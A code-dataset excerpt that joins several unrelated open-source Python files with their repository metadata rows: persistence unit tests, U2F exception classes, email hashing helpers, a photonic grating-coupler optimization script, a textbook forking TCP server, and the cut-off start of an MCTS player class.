self.service.persist_sampler_state(1, {"test":"abc","test2":123})
sampler_state = self.service.get_sampler_state(1)
self.assertEquals(2, len(sampler_state))
self.assertEquals("abc", sampler_state["test"])
self.assertEquals("123", sampler_state["test2"])
del sampler_state["test"]
sampler_state["test2"] = "xyz"
self.service.persist_sampler_state(1, sampler_state)
sampler_state = self.service.get_sampler_state(1)
self.assertEquals(1, len(sampler_state))
self.assertEquals("xyz", sampler_state["test2"])
# Now test the same thing on the data source state
data_source_state = self.service.get_data_source_state(1)
self.assertEquals(0, len(data_source_state))
self.service.persist_data_source_state(1, {"test":"abc","test2":123})
data_source_state = self.service.get_data_source_state(1)
self.assertEquals(2, len(data_source_state))
self.assertEquals("abc", data_source_state["test"])
self.assertEquals("123", data_source_state["test2"])
del data_source_state["test"]
data_source_state["test2"] = "xyz"
self.service.persist_data_source_state(1, data_source_state)
data_source_state = self.service.get_data_source_state(1)
self.assertEquals(1, len(data_source_state))
self.assertEquals("xyz", data_source_state["test2"])
def test_dataset_data_source_unit(self):
"""This test creates a simple schema hierarchy, and tests updates, etc"""
unit = UnitOfWork(None)
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
schema_id = unit.post(schema1)
loc = Location(10.0, 11.0)
loc.name = "Location"
loc_id = unit.post(loc)
dataset1 = Dataset()
dataset1.schema = schema_id
dataset1.location = loc_id
dataset1_id = unit.post(dataset1)
dataset2 = Dataset()
dataset2.schema = schema_id
dataset2.location = loc_id
dataset2.data_source = DatasetDataSource(dataset1_id, "")
dataset2_id = unit.post(dataset2)
ret = self.service.commit(unit, None)
found = False
for r in ret:
if isinstance(r, Dataset) and dataset1_id == r.correlationid:
dataset1_id = r.id
elif isinstance(r, Dataset) and dataset2_id == r.correlationid:
self.assertEquals(dataset1_id, r.data_source.dataset_id, "Data source dataset_id was not updated")
found = True
self.assertTrue(found, "Didn't find the dataset with the dataset data source")
def test_region_persist(self):
"""Test that the region persists correctly, including version numbering, and that
region points are correctly updated"""
region = Region("Region 1")
region.region_points = [(1, 1), (1, 2)]
region1 = self.service.persist(region)
self.assertEquals(1, region1.version)
region1.version = 0
self.assertRaises(StaleObjectError, self.service.persist, region1)
region1.version = 1
region1.region_points = [(99,100)]
region2 = self.service.persist(region1)
self.assertEquals(2, region2.version)
self.assertEquals(1, len(region2.region_points))
self.assertEquals((99, 100), region2.region_points[0])
def test_location_persist(self):
loc = Location(10.0, 11.0)
loc.name = "Location"
loc1 = self.service.persist(loc)
self.assertEquals(1, loc1.version)
loc1.version = 0
self.assertRaises(StaleObjectError, self.service.persist, loc1)
loc1.version = 1
loc2 = self.service.persist(loc1)
self.assertEquals(2, loc2.version)
def test_schema_persist(self):
schema = DataEntrySchema("base1")
schema.addAttr(FileDataType("file"))
schema1 = self.service.persist(schema)
self.assertEquals(1, schema1.version)
schema1.version = 0
self.assertRaises(PersistenceError, self.service.persist, schema1)
schema1.version = 1
self.assertRaises(PersistenceError, self.service.persist, schema1)
def test_dataset_persist(self):
schema = DataEntrySchema("base1")
schema.addAttr(FileDataType("file"))
schema = self.service.persist(schema)
loc = Location(10.0, 11.0)
loc.name = "Location"
loc = self.service.persist(loc)
dataset = Dataset()
dataset.schema = schema.id
dataset.location = loc.id
dataset1 = self.service.persist(dataset)
self.assertEquals(1, dataset1.version)
dataset1.version = 0
self.assertRaises(StaleObjectError, self.service.persist, dataset1)
dataset1.version = 1
dataset2 = self.service.persist(dataset1)
self.assertEquals(2, dataset2.version)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 1,280,707,658,308,624,400 | 40.672026 | 208 | 0.624074 | false | 3.866348 | true | false | false |
Yubico/u2fval | u2fval/exc.py | 1 | 1977 | # Copyright (c) 2014 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__all__ = [
'U2fException',
'BadInputException',
'NoEligibleDevicesException',
'DeviceCompromisedException'
]
class U2fException(Exception):
status_code = 400
code = -1
def __init__(self, message, data=None):
super(U2fException, self).__init__(message, data)
self.message = message
self.data = data
class BadInputException(U2fException):
code = 10
class NotFoundException(BadInputException):
status_code = 404
class NoEligibleDevicesException(U2fException):
code = 11
class DeviceCompromisedException(U2fException):
code = 12
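# A minimal handling sketch (hypothetical caller code, not part of this module):
#
#     try:
#         do_u2f_operation()
#     except U2fException as e:
#         payload = {'errorCode': e.code, 'errorMessage': e.message}
#         status = e.status_code   # e.g. 400, or 404 for NotFoundException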
| bsd-2-clause | -4,314,260,985,684,125,700 | 32.508475 | 71 | 0.738998 | false | 4.242489 | false | false | false |
jack51706/Maildb | core/hashing.py | 2 | 1225 | #!/usr/bin/env python
'''
Copyright (C) 2012-2013 Kevin Breen.
This file is part of the Maildb web application
See the 'LICENSE' File for copying permission.
'''
# All The Hashing Functions will be in here somewhere
import os
import sys
import hashlib
from core.common import Dictionary
class MailHash():
def HashMD5(self, part_data): #Generate the md5
md5_hash = hashlib.md5()
md5_hash.update(part_data)
return md5_hash.hexdigest()
def HashSha1(self, part_data): # Generate the SHA1
sha1_hash = hashlib.sha1()
sha1_hash.update(part_data)
return sha1_hash.hexdigest()
def HashSha256(self, part_data): # Generate the SHA 256
sha256_hash = hashlib.sha256()
sha256_hash.update(part_data)
return sha256_hash.hexdigest()
def HashSha512(self, part_data): # Generate the Sha512
sha512_hash = hashlib.sha512()
sha512_hash.update(part_data)
return sha512_hash.hexdigest()
def Hashssdeep(self, part_data):
import ssdeep
deep = ssdeep.hash(part_data)
return deep
def fileMD5(self, filePath):
fh = open(filePath, 'rb')
m = hashlib.md5()
while True:
data = fh.read(8192)
if not data:
break
m.update(data)
return m.hexdigest()
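# A minimal usage sketch (assumes `part_data` holds raw attachment bytes and
# `path` points to an existing file):
#
#     hasher = MailHash()
#     md5_hex = hasher.HashMD5(part_data)
#     file_md5 = hasher.fileMD5(path)      # reads the file in 8 KB chunks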
| gpl-3.0 | -4,344,832,424,352,688,600 | 14.705128 | 56 | 0.688163 | false | 3.002451 | false | false | false |
stanfordnqp/spins-b | examples/invdes/grating_coupler/grating.py | 1 | 25229 | """2D fiber-to-chip grating coupler optimization code.
This is a simple spins example that optimizes a fiber-to-chip grating coupler
for the SOI platform. See Su et al. Optics Express (2018) for details.
To run an optimization:
$ python3 grating.py run save-folder
To view results:
$ python3 grating.py view save-folder
To see optimization status quickly:
$ python3 grating.py view_quick save-folder
To resume an optimization:
$ python3 grating.py resume save-folder
To generate a GDS file of the grating:
$ python3 grating.py gen_gds save-folder
"""
import os
import pickle
import shutil
import gdspy
import numpy as np
from typing import List, NamedTuple, Tuple
# `spins.invdes.problem_graph` contains the high-level spins code.
from spins.invdes import problem_graph
# Import module for handling processing optimization logs.
from spins.invdes.problem_graph import log_tools
# `spins.invdes.problem_graph.optplan` contains the optimization plan schema.
from spins.invdes.problem_graph import optplan
from spins.invdes.problem_graph import workspace
# If `True`, also minimize the back-reflection.
MINIMIZE_BACKREFLECTION = False
# If `True`, runs an additional `cont_iters' of continuous optimization with
# a discreteness permittivity biasing penalty added.
# Fine-tuning the `initial_value' of `disc_scaling' may be necessary depending
# on the application and the number of wavelengths optimized.
DISCRETENESS_PENALTY = True
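# When enabled, the extra stage minimizes (see create_transformations below):
#     obj + disc_scaling * |obj| / |DiscretePenalty()| * DiscretePenalty()
# i.e. the discreteness penalty is rescaled to be comparable in magnitude to
# the physical objective before being added to it.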
def run_opt(save_folder: str, grating_len: float, wg_width: float) -> None:
"""Main optimization script.
    This function sets up the optimization and executes it.
Args:
save_folder: Location to save the optimization data.
"""
os.makedirs(save_folder)
wg_thickness = 220
sim_space = create_sim_space(
"sim_fg.gds",
"sim_bg.gds",
grating_len=grating_len,
box_thickness=2000,
wg_thickness=wg_thickness,
etch_frac=0.5,
wg_width=wg_width)
obj, monitors = create_objective(
sim_space, wg_thickness=wg_thickness, grating_len=grating_len)
trans_list = create_transformations(
obj, monitors, 50, 200, sim_space, min_feature=80)
plan = optplan.OptimizationPlan(transformations=trans_list)
# Save the optimization plan so we have an exact record of all the
# parameters.
with open(os.path.join(save_folder, "optplan.json"), "w") as fp:
fp.write(optplan.dumps(plan))
# Copy over the GDS files.
shutil.copyfile("sim_fg.gds", os.path.join(save_folder, "sim_fg.gds"))
shutil.copyfile("sim_bg.gds", os.path.join(save_folder, "sim_bg.gds"))
# Execute the optimization and indicate that the current folder (".") is
# the project folder. The project folder is the root folder for any
# auxiliary files (e.g. GDS files).
problem_graph.run_plan(plan, ".", save_folder=save_folder)
# Generate the GDS file.
gen_gds(save_folder, grating_len, wg_width)
def create_sim_space(
gds_fg_name: str,
gds_bg_name: str,
grating_len: float = 12000,
etch_frac: float = 0.5,
box_thickness: float = 2000,
wg_width: float = 12000,
wg_thickness: float = 220,
buffer_len: float = 1500,
dx: int = 40,
num_pmls: int = 10,
visualize: bool = False,
) -> optplan.SimulationSpace:
"""Creates the simulation space.
The simulation space contains information about the boundary conditions,
gridding, and design region of the simulation.
Args:
gds_fg_name: Location to save foreground GDS.
gds_bg_name: Location to save background GDS.
grating_len: Length of the grating coupler and design region.
etch_frac: Etch fraction of the grating. 1.0 indicates a fully-etched
grating.
box_thickness: Thickness of BOX layer in nm.
wg_thickness: Thickness of the waveguide.
wg_width: Width of the waveguide.
buffer_len: Buffer distance to put between grating and the end of the
simulation region. This excludes PMLs.
dx: Grid spacing to use.
num_pmls: Number of PML layers to use on each side.
visualize: If `True`, draws the polygons of the GDS file.
Returns:
A `SimulationSpace` description.
"""
# Calculate the simulation size, including PMLs
sim_size = [
grating_len + 2 * buffer_len + dx * num_pmls,
wg_width + 2 * buffer_len + dx * num_pmls
]
# First, we use `gdspy` to draw the waveguides and shapes that we would
# like to use. Instead of programmatically generating a GDS file using
# `gdspy`, we could also simply provide a GDS file (e.g. drawn using
# KLayout).
# Declare some constants to represent the different layers.
LAYER_SILICON_ETCHED = 100
LAYER_SILICON_NONETCHED = 101
# Create rectangles corresponding to the waveguide, the BOX layer, and the
# design region. We extend the rectangles outside the simulation region
# by multiplying locations by a factor of 1.1.
# We distinguish between the top part of the waveguide (which is etched)
# and the bottom part of the waveguide (which is not etched).
waveguide_top = gdspy.Rectangle((-1.1 * sim_size[0] / 2, -wg_width / 2),
(-grating_len / 2, wg_width / 2),
LAYER_SILICON_ETCHED)
waveguide_bottom = gdspy.Rectangle((-1.1 * sim_size[0] / 2, -wg_width / 2),
(grating_len / 2, wg_width / 2),
LAYER_SILICON_NONETCHED)
design_region = gdspy.Rectangle((-grating_len / 2, -wg_width / 2),
(grating_len / 2, wg_width / 2),
LAYER_SILICON_ETCHED)
# Generate the foreground and background GDS files.
gds_fg = gdspy.Cell("FOREGROUND", exclude_from_current=True)
gds_fg.add(waveguide_top)
gds_fg.add(waveguide_bottom)
gds_fg.add(design_region)
gds_bg = gdspy.Cell("BACKGROUND", exclude_from_current=True)
gds_bg.add(waveguide_top)
gds_bg.add(waveguide_bottom)
gdspy.write_gds(gds_fg_name, [gds_fg], unit=1e-9, precision=1e-9)
gdspy.write_gds(gds_bg_name, [gds_bg], unit=1e-9, precision=1e-9)
if visualize:
gdspy.LayoutViewer(cells=[gds_fg])
gdspy.LayoutViewer(cells=[gds_bg])
# The BOX layer/silicon device interface is set at `z = 0`.
#
# Describe materials in each layer.
# We actually have four material layers:
# 1) Silicon substrate
# 2) Silicon oxide BOX layer
# 3) Bottom part of grating that is not etched
# 4) Top part of grating that can be etched.
#
# The last two layers put together properly describe a partial etch.
#
# Note that the layer numbering in the GDS file is arbitrary. In our case,
# layer 100 and 101 correspond to actual structure. Layer 300 is a dummy
# layer; it is used for layers that only have one material (i.e. the
# background and foreground indices are identical) so the actual structure
# used does not matter.
stack = [
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="Si"),
background=optplan.Material(mat_name="Si"),
# Note that layer number here does not actually matter because
# the foreground and background are the same material.
gds_layer=[300, 0],
extents=[-10000, -box_thickness],
),
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="SiO2"),
background=optplan.Material(mat_name="SiO2"),
gds_layer=[300, 0],
extents=[-box_thickness, 0],
),
]
# If `etch-frac` is 1, then we do not need two separate layers.
if etch_frac != 1:
stack.append(
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="Si"),
background=optplan.Material(mat_name="SiO2"),
gds_layer=[LAYER_SILICON_NONETCHED, 0],
extents=[0, wg_thickness * (1 - etch_frac)],
))
stack.append(
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="Si"),
background=optplan.Material(mat_name="SiO2"),
gds_layer=[LAYER_SILICON_ETCHED, 0],
extents=[wg_thickness * (1 - etch_frac), wg_thickness],
))
mat_stack = optplan.GdsMaterialStack(
# Any region of the simulation that is not specified is filled with
# oxide.
background=optplan.Material(mat_name="SiO2"),
stack=stack,
)
sim_z_start = -box_thickness - 1000
sim_z_end = wg_thickness + 1500
# Create a simulation space for both continuous and discrete optimization.
simspace = optplan.SimulationSpace(
name="simspace",
mesh=optplan.UniformMesh(dx=dx),
eps_fg=optplan.GdsEps(gds=gds_fg_name, mat_stack=mat_stack),
eps_bg=optplan.GdsEps(gds=gds_bg_name, mat_stack=mat_stack),
# Note that we explicitly set the simulation region. Anything
# in the GDS file outside of the simulation extents will not be drawn.
sim_region=optplan.Box3d(
center=[0, 0, (sim_z_start + sim_z_end) / 2],
extents=[sim_size[0], dx, sim_z_end - sim_z_start],
),
selection_matrix_type="uniform",
# PMLs are applied on x- and z-axes. No PMLs are applied along y-axis
# because it is the axis of translational symmetry.
pml_thickness=[num_pmls, num_pmls, 0, 0, num_pmls, num_pmls],
)
if visualize:
# To visualize permittivity distribution, we actually have to
# construct the simulation space object.
import matplotlib.pyplot as plt
from spins.invdes.problem_graph.simspace import get_fg_and_bg
context = workspace.Workspace()
eps_fg, eps_bg = get_fg_and_bg(context.get_object(simspace), wlen=1550)
def plot(x):
plt.imshow(np.abs(x)[:, 0, :].T.squeeze(), origin="lower")
plt.figure()
plt.subplot(3, 1, 1)
plot(eps_fg[2])
plt.title("eps_fg")
plt.subplot(3, 1, 2)
plot(eps_bg[2])
plt.title("eps_bg")
plt.subplot(3, 1, 3)
plot(eps_fg[2] - eps_bg[2])
plt.title("design region")
plt.show()
return simspace
def create_objective(
sim_space: optplan.SimulationSpace,
wg_thickness: float,
grating_len: float,
) -> Tuple[optplan.Function, List[optplan.Monitor]]:
"""Creates an objective function.
The objective function is what is minimized during the optimization.
Args:
sim_space: The simulation space description.
wg_thickness: Thickness of waveguide.
grating_len: Length of grating.
Returns:
        A tuple `(obj, monitor_list)` where `obj` is an objective function that
        tries to maximize the coupling efficiency of the grating coupler and
        `monitor_list` is a list of monitors (values to keep track of during
        the optimization).
"""
# Keep track of metrics and fields that we want to monitor.
monitor_list = []
objectives = []
# Set wavelengths to optimize over
wlens = [1550]
for wlen in wlens:
epsilon = optplan.Epsilon(
simulation_space=sim_space,
wavelength=wlen,
)
# Append to monitor list for each wavelength
monitor_list.append(
optplan.FieldMonitor(name="mon_eps_" + str(wlen), function=epsilon))
# Add a Gaussian source that is angled at 10 degrees.
sim = optplan.FdfdSimulation(
source=optplan.GaussianSource(
polarization_angle=0,
theta=np.deg2rad(-10),
psi=np.pi / 2,
center=[0, 0, wg_thickness + 700],
extents=[14000, 14000, 0],
normal=[0, 0, -1],
power=1,
w0=5200,
normalize_by_sim=True,
),
solver="local_direct",
wavelength=wlen,
simulation_space=sim_space,
epsilon=epsilon,
)
monitor_list.append(
optplan.FieldMonitor(
name="mon_field_" + str(wlen),
function=sim,
normal=[0, 1, 0],
center=[0, 0, 0],
))
wg_overlap = optplan.WaveguideModeOverlap(
center=[-grating_len / 2 - 1000, 0, wg_thickness / 2],
extents=[0.0, 1500, 1500.0],
mode_num=0,
normal=[-1.0, 0.0, 0.0],
power=1.0,
)
power = optplan.abs(
optplan.Overlap(simulation=sim, overlap=wg_overlap))**2
monitor_list.append(
optplan.SimpleMonitor(
name="mon_power_" + str(wlen), function=power))
if not MINIMIZE_BACKREFLECTION:
# Spins minimizes the objective function, so to make `power` maximized,
# we minimize `1 - power`.
obj = 1 - power
else:
# TODO: Use a Gaussian overlap to calculate power emitted by grating
# so we only need one simulation to handle backreflection and
# transmission.
refl_sim = optplan.FdfdSimulation(
source=optplan.WaveguideModeSource(
center=wg_overlap.center,
extents=wg_overlap.extents,
mode_num=0,
normal=[1, 0, 0],
power=1.0,
),
solver="local_direct",
wavelength=wlen,
simulation_space=sim_space,
epsilon=epsilon,
)
refl_power = optplan.abs(
optplan.Overlap(simulation=refl_sim, overlap=wg_overlap))**2
monitor_list.append(
optplan.SimpleMonitor(
name="mon_refl_power_" + str(wlen), function=refl_power))
# We now have two sub-objectives: Maximize transmission and minimize
# back-reflection, so we must an objective that defines the appropriate
# tradeoff between transmission and back-reflection. Here, we choose the
# simplest objective to do this, but you can use SPINS functions to
# design more elaborate objectives.
obj = (1 - power) + 4 * refl_power
objectives.append(obj)
obj = sum(objectives)
return obj, monitor_list
def create_transformations(
obj: optplan.Function,
monitors: List[optplan.Monitor],
cont_iters: int,
disc_iters: int,
sim_space: optplan.SimulationSpaceBase,
min_feature: float = 100,
cont_to_disc_factor: float = 1.1,
) -> List[optplan.Transformation]:
"""Creates a list of transformations for the optimization.
The grating coupler optimization proceeds as follows:
1) Continuous optimization whereby each pixel can vary between device and
background permittivity.
2) Discretization whereby the continuous pixel parametrization is
transformed into a discrete grating (Note that L2D is implemented here).
3) Further optimization of the discrete grating by moving the grating
edges.
Args:
        obj: The objective function to minimize.
monitors: List of monitors to keep track of.
cont_iters: Number of iterations to run in continuous optimization.
disc_iters: Number of iterations to run in discrete optimization.
        sim_space: Simulation space to use.
min_feature: Minimum feature size in nanometers.
cont_to_disc_factor: Discretize the continuous grating with feature size
constraint of `min_feature * cont_to_disc_factor`.
`cont_to_disc_factor > 1` gives discrete optimization more wiggle
room.
Returns:
A list of transformations.
"""
# Setup empty transformation list.
trans_list = []
# First do continuous relaxation optimization.
cont_param = optplan.PixelParametrization(
simulation_space=sim_space,
init_method=optplan.UniformInitializer(min_val=0, max_val=1))
trans_list.append(
optplan.Transformation(
name="opt_cont",
parametrization=cont_param,
transformation=optplan.ScipyOptimizerTransformation(
optimizer="L-BFGS-B",
objective=obj,
monitor_lists=optplan.ScipyOptimizerMonitorList(
callback_monitors=monitors,
start_monitors=monitors,
end_monitors=monitors),
optimization_options=optplan.ScipyOptimizerOptions(
maxiter=cont_iters),
),
))
    # If true, do another round of continuous optimization with a discreteness bias.
if DISCRETENESS_PENALTY:
        # Define parameters necessary to normalize the discrete penalty term
obj_val_param = optplan.Parameter(
name="param_obj_final_val", initial_value=1.0)
obj_val_param_abs = optplan.abs(obj_val_param)
discrete_penalty_val = optplan.Parameter(
name="param_discrete_penalty_val", initial_value=1.0)
discrete_penalty_val_abs = optplan.abs(discrete_penalty_val)
# Initial value of scaling is arbitrary and set for specific problem
disc_scaling = optplan.Parameter(
name="discrete_scaling", initial_value=5)
normalization = disc_scaling * obj_val_param_abs / discrete_penalty_val_abs
obj_disc = obj + optplan.DiscretePenalty() * normalization
trans_list.append(
optplan.Transformation(
name="opt_cont_disc",
parameter_list=[
optplan.SetParam(
parameter=obj_val_param,
function=obj,
parametrization=cont_param),
optplan.SetParam(
parameter=discrete_penalty_val,
function=optplan.DiscretePenalty(),
parametrization=cont_param)
],
parametrization=cont_param,
transformation=optplan.ScipyOptimizerTransformation(
optimizer="L-BFGS-B",
objective=obj_disc,
monitor_lists=optplan.ScipyOptimizerMonitorList(
callback_monitors=monitors,
start_monitors=monitors,
end_monitors=monitors),
optimization_options=optplan.ScipyOptimizerOptions(
maxiter=cont_iters),
)))
# Discretize. Note we add a little bit of wiggle room by discretizing with
    # a slightly larger feature size than what our target is (by a factor of
# `cont_to_disc_factor`). This is to give the optimization a bit more wiggle
# room later on.
disc_param = optplan.GratingParametrization(
simulation_space=sim_space, inverted=True)
trans_list.append(
optplan.Transformation(
name="cont_to_disc",
parametrization=disc_param,
transformation=optplan.GratingEdgeFitTransformation(
parametrization=cont_param,
min_feature=cont_to_disc_factor * min_feature)))
# Discrete optimization.
trans_list.append(
optplan.Transformation(
name="opt_disc",
parametrization=disc_param,
transformation=optplan.ScipyOptimizerTransformation(
optimizer="SLSQP",
objective=obj,
constraints_ineq=[
optplan.GratingFeatureConstraint(
min_feature_size=min_feature,
simulation_space=sim_space,
boundary_constraint_scale=1.0,
)
],
monitor_lists=optplan.ScipyOptimizerMonitorList(
callback_monitors=monitors,
start_monitors=monitors,
end_monitors=monitors),
optimization_options=optplan.ScipyOptimizerOptions(
maxiter=disc_iters),
),
))
return trans_list
def view_opt(save_folder: str) -> None:
"""Shows the result of the optimization.
This runs the auto-plotter to plot all the relevant data.
See `examples/wdm2` IPython notebook for more details on how to process
the optimization logs.
Args:
save_folder: Location where the log files are saved.
"""
log_df = log_tools.create_log_data_frame(
log_tools.load_all_logs(save_folder))
monitor_descriptions = log_tools.load_from_yml(
os.path.join(os.path.dirname(__file__), "monitor_spec.yml"))
log_tools.plot_monitor_data(log_df, monitor_descriptions)
def view_opt_quick(save_folder: str) -> None:
"""Prints the current result of the optimization.
Unlike `view_opt`, which plots fields and optimization trajectories,
`view_opt_quick` prints out scalar monitors in the latest log file. This
is useful for having a quick look into the state of the optimization.
Args:
save_folder: Location where the log files are saved.
"""
with open(workspace.get_latest_log_file(save_folder), "rb") as fp:
log_data = pickle.load(fp)
for key, data in log_data["monitor_data"].items():
if np.isscalar(data):
print("{}: {}".format(key, data.squeeze()))
def resume_opt(save_folder: str) -> None:
"""Resumes a stopped optimization.
This restarts an optimization that was stopped prematurely. Note that
    resuming an optimization will not lead to exactly the same results as if the
    optimization had finished the first time around.
Args:
save_folder: Location where log files are saved. It is assumed that
the optimization plan is also saved there.
"""
# Load the optimization plan.
with open(os.path.join(save_folder, "optplan.json")) as fp:
plan = optplan.loads(fp.read())
# Run the plan with the `resume` flag to restart.
problem_graph.run_plan(plan, ".", save_folder=save_folder, resume=True)
def gen_gds(save_folder: str, grating_len: float, wg_width: float) -> None:
"""Generates a GDS file of the grating.
Args:
save_folder: Location where log files are saved. It is assumed that
the optimization plan is also saved there.
grating_len: Length of the grating.
wg_width: Width of the grating/bus waveguide.
"""
# Load the optimization plan.
with open(os.path.join(save_folder, "optplan.json")) as fp:
plan = optplan.loads(fp.read())
dx = plan.transformations[-1].parametrization.simulation_space.mesh.dx
# Load the data from the latest log file.
with open(workspace.get_latest_log_file(save_folder), "rb") as fp:
log_data = pickle.load(fp)
if log_data["transformation"] != plan.transformations[-1].name:
raise ValueError("Optimization did not run until completion.")
coords = log_data["parametrization"]["vector"] * dx
if plan.transformations[-1].parametrization.inverted:
coords = np.insert(coords, 0, 0, axis=0)
coords = np.insert(coords, -1, grating_len, axis=0)
# `coords` now contains the location of the grating edges. Now draw a
# series of rectangles to represent the grating.
grating_poly = []
for i in range(0, len(coords), 2):
grating_poly.append(
((coords[i], -wg_width / 2), (coords[i], wg_width / 2),
(coords[i + 1], wg_width / 2), (coords[i + 1], -wg_width / 2)))
# Save the grating to `grating.gds`.
grating = gdspy.Cell("GRATING", exclude_from_current=True)
grating.add(gdspy.PolygonSet(grating_poly, 100))
gdspy.write_gds(
os.path.join(save_folder, "grating.gds"), [grating],
unit=1.0e-9,
precision=1.0e-9)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"action",
choices=("run", "view", "view_quick", "resume", "gen_gds"),
help="Must be either \"run\" to run an optimization, \"view\" to "
"view the results, \"resume\" to resume an optimization, or "
"\"gen_gds\" to generate the grating GDS file.")
parser.add_argument(
"save_folder", help="Folder containing optimization logs.")
grating_len = 12000
wg_width = 12000
args = parser.parse_args()
if args.action == "run":
run_opt(args.save_folder, grating_len=grating_len, wg_width=wg_width)
elif args.action == "view":
view_opt(args.save_folder)
elif args.action == "view_quick":
view_opt_quick(args.save_folder)
elif args.action == "resume":
resume_opt(args.save_folder)
elif args.action == "gen_gds":
gen_gds(args.save_folder, grating_len=grating_len, wg_width=wg_width)
| gpl-3.0 | 1,575,267,830,922,040,600 | 37.517557 | 84 | 0.614214 | false | 3.83012 | false | false | false |
nathanIL/books | Foundations_of_Python_Network_Programming/Chapter02/tcp_servers.py | 1 | 3607 | """
Forking TCP Servers stuff based on book material (but not 1:1)
"""
import socket
import argparse
import time
import os
from multiprocessing import Process
from functools import partial
def args_handle(handlers, string):
if string in handlers.keys():
return handlers.get(string)
else:
raise argparse.ArgumentTypeError("Invalid server type provided")
def parse_arguments():
"""
Parse command line arguments
:return: argparse.Namespace object holding the arguments
"""
HANDLERS = {h: o for h, o in globals().items() if h.startswith('handle_')}
parser = argparse.ArgumentParser()
parser.add_argument('--port', help='The port on which the server will listen', type=int, default=51150)
parser.add_argument('--mproc', help='The maximum allowed clients / processes at a given time', type=int, default=10)
parser.add_argument('--type', help='The server type: ' + ', '.join(HANDLERS.keys()), default='handle_fixed_request',
type=partial(args_handle, HANDLERS))
return parser.parse_args()
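# Example invocation (assuming the module is run directly):
#   python tcp_servers.py --port 51150 --mproc 10 --type handle_fixed_request
# --type accepts the name of any handle_* function defined in this module.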
def handle_fixed_request(connection, address, size=512):
"""
Fixed size request handler
:param connection: the socket / connection object received
:param address: the remote address
:param size: The maximum size of each request
"""
start = time.time()
total_data = ''
try:
while len(total_data) < size:
data = connection.recv(size - len(total_data))
if not data:
break
print("[SERVER | PID {0}]: {1}".format(os.getpid(), data.rstrip()))
total_data += data
except Exception as e:
print("Error ", e.message)
finally:
connection.close()
end = time.time() - start
print("[SERVER]: {0} closed connection after {1:.2f} seconds".format(address, end))
def handle_http_request(connection, address):
"""
    Dead-simple, naive HTTP handler.
:param connection: The socket
:param address: The remote-end address
"""
REQUIRED_HEADERS = ['Content-Length']
SUPPORTED_METHODS = ['GET', 'POST']
HTTP_VERSIONS = ['HTTP/1.1']
headers = dict()
headers_raw = ''
body = ''
while True:
h = connection.recv(1024)
if not h:
break
elif '\r\n' in h:
crlf_idx = h.rfind('\r\n')
headers_raw += h[:crlf_idx]
body = h[crlf_idx:]
break
headers_raw += h
# Parse Headers
request_line = headers_raw.split('\n')[0].split()
# TODO: Validate the resource element
if len(request_line) != 3 or request_line[0] not in SUPPORTED_METHODS or request_line[2] not in HTTP_VERSIONS:
print("[ERROR]: Invalid HTTP request line: " + ' '.join(request_line))
return
    headers = {e.split(':', 1)[0].strip(): e.split(':', 1)[1].strip()
               for e in headers_raw.splitlines()[1:] if ':' in e}
print(headers)
# Get body
def server(port, mproc, server_type):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.listen(mproc)
print("[SERVER]: Listening on {0}".format(s.getsockname()))
while True:
(connection, address) = s.accept()
print("[SERVER]: Connection established with {0}".format(address))
process = Process(target=server_type, args=(connection, address))
process.daemon = True
process.start()
if __name__ == "__main__":
args = parse_arguments()
server(port=args.port, mproc=args.mproc, server_type=args.type)
| apache-2.0 | 830,403,105,968,279,600 | 31.495495 | 120 | 0.61852 | false | 3.874329 | false | false | false |
jbradberry/mcts | mcts/uct.py | 1 | 6593 | from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import time
from math import log, sqrt
from random import choice
from six.moves import range
class Stat(object):
__slots__ = ('value', 'visits')
def __init__(self, value=0.0, visits=0):
self.value = value
self.visits = visits
def __repr__(self):
return u"Stat(value={}, visits={})".format(self.value, self.visits)
class UCT(object):
def __init__(self, board, **kwargs):
self.board = board
self.history = []
self.stats = {}
self.max_depth = 0
self.data = {}
self.calculation_time = float(kwargs.get('time', 30))
self.max_actions = int(kwargs.get('max_actions', 1000))
# Exploration constant, increase for more exploratory actions,
# decrease to prefer actions with known higher win rates.
self.C = float(kwargs.get('C', 1.4))
def update(self, state):
self.history.append(self.board.to_compact_state(state))
def display(self, state, action):
return self.board.display(state, action)
def winner_message(self, winners):
return self.board.winner_message(winners)
def get_action(self):
# Causes the AI to calculate the best action from the
# current game state and return it.
self.max_depth = 0
self.data = {'C': self.C, 'max_actions': self.max_actions, 'name': self.name}
self.stats.clear()
state = self.history[-1]
player = self.board.current_player(state)
legal = self.board.legal_actions(state)
# Bail out early if there is no real choice to be made.
if not legal:
return {'type': 'action', 'message': None, 'extras': self.data.copy()}
if len(legal) == 1:
return {
'type': 'action',
